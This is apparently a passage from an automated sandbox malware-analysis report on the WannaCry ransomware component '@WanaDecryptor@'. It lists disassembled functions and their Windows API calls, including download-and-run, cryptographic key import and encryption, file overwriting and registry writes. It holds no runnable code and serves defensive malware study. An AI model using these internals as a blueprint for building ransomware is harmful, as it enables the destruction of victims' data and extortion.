    • #1641.MFC42(00000000), ref: 004032E9
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
    • #1641.MFC42(00000000), ref: 0040331F
    • #3092.MFC42(00000408,00000000), ref: 0040332B
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
    • #3092.MFC42(00000409), ref: 00403353
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
    • #3092.MFC42(00000002), ref: 00403372
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
    • #3092.MFC42(0000040E), ref: 00403394
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
      • Part of subcall function 00403CB0: FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
      • Part of subcall function 00403CB0: sscanf.MSVCRT ref: 00403D26
      • Part of subcall function 00403CB0: fopen.MSVCRT ref: 00403D45
      • Part of subcall function 00403CB0: fread.MSVCRT ref: 00403D69
      • Part of subcall function 00403CB0: sprintf.MSVCRT ref: 00403D99
      • Part of subcall function 00403CB0: SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
      • Part of subcall function 00403CB0: #823.MFC42(00000088), ref: 00403DE4
      • Part of subcall function 00403CB0: SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
      • Part of subcall function 00403CB0: fclose.MSVCRT ref: 00403E16
      • Part of subcall function 00403CB0: FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
      • Part of subcall function 00403CB0: FindClose.KERNEL32(?), ref: 00403E3B
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
    • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
    • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00406AE0, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78
    APIs
    • #540.MFC42(?,0001DAA0), ref: 00406B03
    • #3874.MFC42 ref: 00406B1B
    • #537.MFC42(msg\), ref: 00406B29
    • #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
    • sprintf.MSVCRT ref: 00406B59
    • #800.MFC42(?,?,0001DAA0), ref: 00406B62
    • #800.MFC42 ref: 00406B73
    • GetFileAttributesA.KERNEL32(?), ref: 00406B7D
    • #537.MFC42(msg\), ref: 00406B91
    • #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
    • sprintf.MSVCRT ref: 00406BBB
    • #800.MFC42(?,?,?,?,?,0001DAA0), ref: 00406BC4
    • #800.MFC42 ref: 00406BD5
      • Part of subcall function 00406CF0: SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
      • Part of subcall function 00406CF0: #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,0001DAA0), ref: 00406D39
      • Part of subcall function 00406CF0: SendMessageA.USER32 ref: 00406D69
      • Part of subcall function 00406CF0: #1979.MFC42 ref: 00406D6F
      • Part of subcall function 00406CF0: #665.MFC42 ref: 00406D87
    • #800.MFC42(?), ref: 00406BF5
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040B840, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 138
    APIs
    • sprintf.MSVCRT ref: 0040B87A
    • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
    • sprintf.MSVCRT ref: 0040B924
    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
    • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
      • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000428), ref: 0040B793
      • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
      • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
      • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
      • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
      • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
    • CreateProcessA.KERNEL32(00000000,?), ref: 0040B9AA
    • WaitForSingleObject.KERNEL32(?,00001388), ref: 0040B9CF
    • WaitForSingleObject.KERNEL32(?,00007530), ref: 0040B9E2
    • CloseHandle.KERNEL32(?), ref: 0040B9EF
    • CloseHandle.KERNEL32(?), ref: 0040B9F6
      • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000000,00000428), ref: 0040B6B4
      • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
      • Part of subcall function 0040B6A0: sprintf.MSVCRT ref: 0040B74E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00402C40, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72
    APIs
      • Part of subcall function 00404B70: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404B86
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00402C46), ref: 00404BA3
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,00402C46), ref: 00404BB0
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,00402C46), ref: 00404BBD
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,00402C46), ref: 00404BCA
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,00402C46), ref: 00404BD7
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,00402C46), ref: 00404BE4
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00405580, Relevance: 27.2, APIs: 18, Instructions: 187
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00408D70, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00401600, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120
    APIs
    • #537.MFC42(Received response), ref: 00401634
    • #2385.MFC42 ref: 00401653
    • #537.MFC42(Succeed), ref: 0040166F
    • #2385.MFC42(?,?,?,Succeed), ref: 00401684
    • #537.MFC42(Sent request), ref: 0040169F
    • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
    • #2385.MFC42 ref: 004016D3
    • #537.MFC42(Connected), ref: 004016F5
      • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
      • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
      • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
    • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
    • #2385.MFC42 ref: 00401729
    • #2385.MFC42(?,?,?), ref: 0040174C
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404B70, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404B86
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00402C46), ref: 00404BA3
    • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,00402C46), ref: 00404BB0
    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,00402C46), ref: 00404BBD
    • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,00402C46), ref: 00404BCA
    • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,00402C46), ref: 00404BD7
    • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,00402C46), ref: 00404BE4
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040D6A0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120
    APIs
    • #9.WS2_32 ref: 0040D6C7
    • #23.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
    • #2.WS2_32(00000000,?,00000010), ref: 0040D709
    • #10.WS2_32(00000000,8004667E,?), ref: 0040D728
    • #4.WS2_32(00000000,?,00000010), ref: 0040D73A
    • #18.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
    • #151.WS2_32(00000000,?), ref: 0040D791
    • #151.WS2_32(00000000,?,00000000,?), ref: 0040D7A3
    • #10.WS2_32(00000000,8004667E,?,00000000,?), ref: 0040D7BB
    • #21.WS2_32(00000000), ref: 0040D7DD
    • #21.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
    • #3.WS2_32(00000000), ref: 0040D80E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404DD0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89
    APIs
    • #4710.MFC42 ref: 00404DD5
    • CreateSolidBrush.GDI32(?), ref: 00404DE9
    • #1641.MFC42(00000000), ref: 00404DF3
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
    • #1641.MFC42(00000000), ref: 00404E26
    • #3092.MFC42(00000403,00000000), ref: 00404E32
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
    • #3092.MFC42(00000001), ref: 00404E57
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
    • #3092.MFC42(00000002), ref: 00404E76
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00411CF0, Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450
    APIs
      • Part of subcall function 00410A50: SetFilePointer.KERNEL32(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
      • Part of subcall function 00410A50: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
    • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411E5B
      • Part of subcall function 00410AF0: ReadFile.KERNEL32(000000FF,00000404,ZA,00000404,00000000), ref: 00410B18
    • #825.MFC42(00000000), ref: 00411E84
    • _mbsstr.MSVCRT ref: 00411F04
    • _mbsstr.MSVCRT ref: 00411F1B
    • _mbsstr.MSVCRT ref: 00411F32
    • _mbsstr.MSVCRT ref: 00411F49
      • Part of subcall function 00411B80: SystemTimeToFileTime.KERNEL32(?,?), ref: 00411BE6
    • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00412078
    • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?), ref: 004121FB
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004020A0, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 359
    APIs
    • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
    • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004022AB
    • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 004022E5
    • SetEndOfFile.KERNEL32(00000000), ref: 004022E8
      • Part of subcall function 00404AF0: EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
      • Part of subcall function 00404AF0: LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
      • Part of subcall function 00404AF0: LeaveCriticalSection.KERNEL32(00000014), ref: 00404B3B
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
    • _local_unwind2.MSVCRT ref: 00402452
    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040248A
    • SetEndOfFile.KERNEL32(00000000), ref: 00402491
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 004024AD
    • _local_unwind2.MSVCRT ref: 00402511
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00406DC0, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103
    APIs
    • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
    • #823.MFC42(00000001,?,?), ref: 00406DEC
    • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
    • _strnicmp.MSVCRT ref: 00406E3E
    • _strnicmp.MSVCRT ref: 00406E5A
    • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
    • #6136.MFC42 ref: 00406EC4
    • #825.MFC42(?), ref: 00406ED7
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00412360, Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366
    APIs
      • Part of subcall function 00411660: malloc.MSVCRT ref: 004116C8
      • Part of subcall function 00411660: malloc.MSVCRT ref: 004116E7
      • Part of subcall function 00411660: free.MSVCRT(00000000,?,?,?,?,?,?,?,00000000), ref: 00411707
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
      • Part of subcall function 00411CF0: #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411E5B
      • Part of subcall function 00411CF0: #825.MFC42(00000000), ref: 00411E84
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F04
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F1B
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F32
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F49
      • Part of subcall function 00411CF0: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00412078
      • Part of subcall function 00411CF0: #825.MFC42(?,?,?,?,?,?,?,?,?,?,?), ref: 004121FB
    • wsprintfA.USER32 ref: 004125F9
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 0041262A
    • wsprintfA.USER32 ref: 00412684
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(00000000), ref: 00412338
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
    • #823.MFC42(00004000), ref: 004126BF
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00412714
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0041275F
    • CloseHandle.KERNEL32(00000000), ref: 00412770
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00413102, Relevance: 16.6, APIs: 11, Instructions: 111
    APIs
    • __set_app_type.MSVCRT ref: 0041312F
    • __p__fmode.MSVCRT ref: 00413144
    • __p__commode.MSVCRT ref: 00413152
    • __setusermatherr.MSVCRT ref: 0041317E
      • Part of subcall function 004133B2: _controlfp.MSVCRT ref: 004133BC
    • _initterm.MSVCRT ref: 00413194
    • __getmainargs.MSVCRT ref: 004131B7
    • _initterm.MSVCRT ref: 004131C7
    • GetStartupInfoA.KERNEL32(?), ref: 00413206
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0041322A
      • Part of subcall function 004133E6: #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
    • exit.MSVCRT ref: 0041323A
    • _XcptFilter.MSVCRT ref: 0041324C
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00401C70, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114
    APIs
    • wcscat.MSVCRT ref: 00401CC1
    • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
    • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
    • RegQueryValueExA.ADVAPI32 ref: 00401D81
    • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
    • RegCloseKey.ADVAPI32(00000000), ref: 00401DA3
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404280, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51
    APIs
    • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
    • GetParent.USER32(?), ref: 004042BB
    • #2864.MFC42(00000000), ref: 004042C2
    • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
    • #2379.MFC42 ref: 004042DD
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
    • #2379.MFC42(?), ref: 004042FF
      • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
      • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
      • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
      • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
      • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040BAF0, Relevance: 15.3, APIs: 10, Instructions: 301
    APIs
      • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
    • strtok.MSVCRT ref: 0040BBA9
      • Part of subcall function 0040C7B0: #825.MFC42(?,00000000,0040BBD1,00000000,00000000,00000000), ref: 0040C7D7
      • Part of subcall function 0040C920: ?_Xlen@std@@YAXXZ.MSVCP60(00000001,?,0040BBE8,00000000,?,00000000,00000000,00000000), ref: 0040C92D
      • Part of subcall function 0040C800: #823.MFC42(00000018,00000000,00000000,00000001,?,0040BC08), ref: 0040C80F
    • strtok.MSVCRT ref: 0040BC22
    • #825.MFC42(?,?), ref: 0040BCDD
    • GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040BCEC
    • srand.MSVCRT ref: 0040BCF3
    • rand.MSVCRT ref: 0040BD09
      • Part of subcall function 0040CE50: #825.MFC42(?,?,0040BD9E,00000000,?,?,?,00000000,00000000), ref: 0040CE6F
      • Part of subcall function 0040CE50: #825.MFC42(00000008,?,0040BD9E,00000000,?,?,?,00000000,00000000), ref: 0040CE95
